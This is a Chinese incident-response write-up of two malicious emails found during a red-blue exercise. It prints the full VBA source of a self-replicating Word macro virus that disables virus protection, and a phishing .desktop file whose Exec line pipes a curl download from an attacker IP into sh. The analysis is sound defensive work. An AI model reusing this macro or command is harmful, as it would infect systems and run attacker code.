记录两次恶意邮件分析排查记录
2024-1-16 20:4:25 Author: Reset安全(查看原文) 阅读量:14 收藏

01 背景
    一次攻防演练值守期间,收到客户上报两起邮件相关的安全事件,收到事件上报后立即展开排查处理
    事件一,一员工在清理邮箱历史邮件时,触发了天擎的病毒实时查杀告警,提示该邮件为病毒邮件,疑似office文档类病毒,于是该员工上报寻求排查处理。
    事件二,一员工收到主题为“关于开展网络安全自查工作通知”的邮件,根据员工安全意识判断与期间是攻防演练中,怀疑为攻击队恶意投放的钓鱼邮件,于是上报安全部进行排查处理。

02 事件一:病毒邮件排查
    拿到邮件备份样本,发现其具有附件文件,将附件保存至虚拟机,使用天擎进行病毒查杀,其中“工作收入证明(稳定工作版).doc”文档报毒,类型为office文档类病毒,初步怀疑为word文档的宏病毒文件。
    使用word打开文件,查看宏代码区域,确实存在宏代码,代码如下:
'Close()Open()Close()Open()Private Sub Document_Open()    On Error Resume Next    Options.VirusProtection = False    EnableCancelKey = wdCancelDisabled    Set maci = MacroContainer.VBProject.VBComponents.Item(1)    Set macic = maci.codemodule    ns$ = Left(macic.Lines(1, 1), 21)    Set inf = NormalTemplate: nsi$ = ns$ + "Close()"        If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"    Set infc = inf.VBProject.VBComponents    Set infi = infc.Item(1)    Set infic = infi.codemodule    infi.Name = "ThisDocument"    For mx = 2 To infc.Count        infc.Remove infc.Item(2)    Next mx        If infic.countlines <> macic.countoflines Then            infic.deletelines 1, infic.countoflines            For coco = 1 To macic.countoflines                infic.insertlines coco, macic.Lines(coco, 1)            Next coco            infic.replaceline 1, nsi$        End If    If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName    EnableCancelKey = wdCancelDisabledEnd Sub'ThisDocument v 1.0 1999
    通过宏代码可以很明显地看出一些值得怀疑的行为,例如:
On Error Resume Next:遇到错误时,代码会继续执行下一条指令,而不是停止。Options.VirusProtection = False:关闭 Word 的病毒保护功能。EnableCancelKey = wdCancelDisabled:禁用取消键,这意味着用户无法通过按 Ctrl + S 来中断宏的执行。
    这三条代码一般非正常逻辑需要,符合病毒代码段需要。
    使用云沙箱进行文件的动态分析:

    结合静态与动态分析,该文件确实为病毒文件,宏代码内容与文档操作、信息获取相关,并没有具体的攻击行为或驻留行为,员工反馈该邮件为2016年的历史邮件,威胁情报也显示为2017年的病毒文件,危害较小,通知该员工进行文件删除即可。
03 事件二:钓鱼邮件排查
    一员工疑似收到钓鱼邮件,根据发件邮箱与邮件内容判断:

    通过邮件内容不难看出,邮件诱导用户下载“自查工具”压缩包,里面不出意外就是攻击者的恶意文件,提取压缩包内容进行分析。
    解压后为一个.desktop文件,记事本打开,很简单的一段回连测试代码。
[Desktop Entry]Name[zh_CN]=自查工具Type=ApplicationExec=bash -c "curl http://101.xxx.xxx.158:13338/|sh"Terminal=falseIcon=deepin-defender
    攻击IP有了,在设备上进行IP封堵与流量排查,文件特征MD5加入黑名单,通知相关员工提高安全意识。
04 总结
    钓鱼邮件是一种常见的网络攻击手段,攻击者通常会伪装成合法的发件人,发送带有恶意链接或附件的邮件,诱骗收件人点击链接或打开附件,进而窃取个人信息或进行其他恶意行为。
    作为防守方,针对钓鱼邮件攻击,可以采取以下措施:
  • 建立完善的邮件过滤系统:通过技术手段对邮件进行过滤,识别并拦截钓鱼邮件。
  • 提高员工安全意识:定期开展网络安全培训,让员工了解钓鱼邮件的识别方法,提高警惕性。
  • 建立应急响应机制:及时发现并处置钓鱼邮件攻击事件,减少损失。
  • 加强与相关部门的合作:与公安、通信管理局等部门加强合作,共同打击网络犯罪。
    总之,针对钓鱼邮件攻击,防守方需要建立多层次的防范体系,提高员工安全意识,加强技术手段和应急响应能力,以保障企业的网络安全。同时,对于任何形式的网络攻击,都应该采取零容忍的态度,及时发现并处理,维护网络空间的健康和稳定。

文章来源: http://mp.weixin.qq.com/s?__biz=MzU3Mzg1NzMyNw==&mid=2247484842&idx=1&sn=25bd5aac68f9251360e8e3185cb61096&chksm=fc35109adc0f1c62ded692879da8057ca3a041020e8d7476b33c0b41dc39d969ad2aff1e7964&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh